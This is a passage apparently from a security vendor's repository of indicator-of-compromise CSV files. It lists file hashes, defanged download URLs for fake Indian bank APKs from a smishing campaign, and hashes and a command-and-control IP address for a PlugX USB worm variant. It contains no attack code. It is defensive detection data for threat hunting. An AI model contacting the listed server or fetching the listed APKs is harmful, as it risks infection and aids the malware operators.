sha256,bcc4d8752143d6327db02e3c52bd74ce744cf98c0aeafd205019ffc87af5bd40,app.py 50 | sha256,342b5990845f9dcb8723927da482301cf8e14fcb69603edbe529260ea5207f43,app.py 51 | sha256,9838a881148d4fa9c17790ab70cced2e6c9f835d1ad3855f3e4013267dbad90c,bot.py 52 | sha256,c20f8edb938dff126e8e53add1629495a1c59c351d783eef61d3b9900a0726c5,bot_.py 53 | sha256,5854a2f5a4f5bcbae8488a5abd05095bfe74e8f5b18dfc728d8732b61ecf3118,main.py 54 | sha256,11c429b0ce110d4e9380f5a520a682c633e342c1d20538ff74869c0fe3e6e3af,main.py 55 | sha256,b5a1afb3b9de392f7478dd7de55dccb1a88ffe53351ce100b2da24bd2022b482,main.py 56 | sha256,f3cc80d90c7daee04a31317dfa36c7cb3975cabd6c63fb213aed901c8217a4d4,main.py 57 | sha256,19739d8c64656cc2b5110ba9375c54bddfcbb3b13f6e74b2360d48ffbf3b0d5e,main.py 58 | sha256,b58a2221aa767a97c49b7347b59dd67d16cb4babc206d444b0195c93c36379a7,main.py 59 | sha256,a3039bdf365755c334c8bf4d7f1792b066060daf8a16269659582d2458a7caf7,main.py 60 | sha256,ef71dc67ad8de97b39e2c98580e35402ae7dfc8f92015c1f9f689e7f2f1177ab,main_.py 61 | sha256,70e33d34fd3794ef78d5b7bd0329b65cda8ea9a343458404b6ae3a666a7a259e,player.py 62 | sha256,02c67a06b83a1482fa3ffdfe93d9ce409f1a1e92173ab720ddee52f887586ec4,script.py 63 | sha256,433138a3783bbf3033b638ed447e6fcddad64832f329cfd6b7b519fa57b31738,OTP Resou_nls..scr 64 | sha256,b27f694c974b44fe2f4a8a25680997db574fa35686c30fa4c4dc9dd4ec40005e,Payment Gateway Resou_nls..scr 65 | -------------------------------------------------------------------------------- /smishing campaign targeting Indian customers 2023-04.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/04/12/tax-time-smishing-campaign/ ‎,IoCs for blog post on Indian smishing campaign April-2023 3 | SHA256,89a6f49ff5eefb8d1065b3a42b58e3361794206f44eb2e3d1e10d31d15aeee6d,detected as Andr/InfoStl-CO 4 | SHA256,5d95237e102f850310562299ff18eb064246a20f5fccc73a4becb892d3b0bb1f,detected as Andr/InfoStl-CO 5 | SHA256,bdf1a3778284abb232133ebb4563b8282c2b444561405a6a2f8bb0dd6b7e220b,detected as Andr/InfoStl-CO 6 | SHA256,45578ac91668bb68d3c9a55c41adf7d8fb17e402667d6aecb315e54fbac48d8a,detected as Andr/InfoStl-CO 7 | SHA256,f6cc5757af6a02532ad03fbfd8783118edfe3a4902ed94406f7c4085c6a8353a,detected as Andr/InfoStl-CO 8 | URL,hxxp://k-onc1.web.app/hdfc-ygsv3[.]apk, 9 | URL,hxxp://icici-kyc.web.app/lClCl-BANK[.]apk, 10 | URL,hxxp://allkycverify.web.app/sbi-app-v2[.]apk, 11 | URL,hxxp://k-1fyv.web.app/sbi-askv[.]apk , 12 | URL,hxxp://k-ji4sas.web.app/sbi-yv3[.]apk, 13 | -------------------------------------------------------------------------------- /usb worm with global reach.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/,Indicators of PlugX USB worm variant active Jan-2023 3 | sha256,352fb4985fdd150d251ff9e20ca14023eab4f2888e481cbd8370c4ed40cfbb9a,"wsc.dll, malicious loader" 4 | sha256,5b807629ab299abec70f88f861487c55a6795d6e27e5d85c64080f072132558c,"wsc.dll, malicious loader" 5 | sha256,6bb959c33fdfc0086ac48586a73273a0a1331f1c4f0053ef021eebe7f377a292,"wsc.dll, malicious loader" 6 | sha256,e8f55d0f327fd1d5f26428b890ef7fe878e135d494acda24ef01c695a2e9136d,"wsc.dll, malicious loader" 7 | sha256,edaa8b62467246d9a43e0f383ed05bc3272d2f8b943a79d9d526f8225c58d1e6,"wsc.dll, malicious loader" 8 | sha256,432a07eb49473fa8c71d50ccaf2bc980b692d458ec4aaedd52d739cb377f3428," *AvastAuth.dat , payload file" 9 | IP,45.142.166.112,C2 server 10 | --------------------------------------------------------------------------------